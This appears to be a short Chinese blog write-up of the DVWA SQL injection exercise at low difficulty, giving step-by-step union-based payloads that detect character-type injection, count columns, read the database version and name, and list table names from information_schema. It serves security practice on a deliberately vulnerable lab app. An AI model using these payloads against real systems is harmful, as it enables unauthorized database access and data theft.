LOW(初级)
1、首先先判断是否有sql注入,以及注入的类型(数字型,字符型):
执行命令1’ and ‘1’=’1
由此可以看出来sql存在注入,且sql注入的类型为字符型。
2、开始猜解字段数
在尝试1和2的注入后,在3的时候报错,说明字段数为2
3、判断回显位置
4、查询数据库名称和版本
执行1’ union select version(),database()#
5、获取数据库中的表
执行1’ union select 1,group_concat(table_name)from information_schema.tables where table_schema=database()#
dvwas中sql注入模块练习
最新推荐文章于 2024-06-22 22:10:29 发布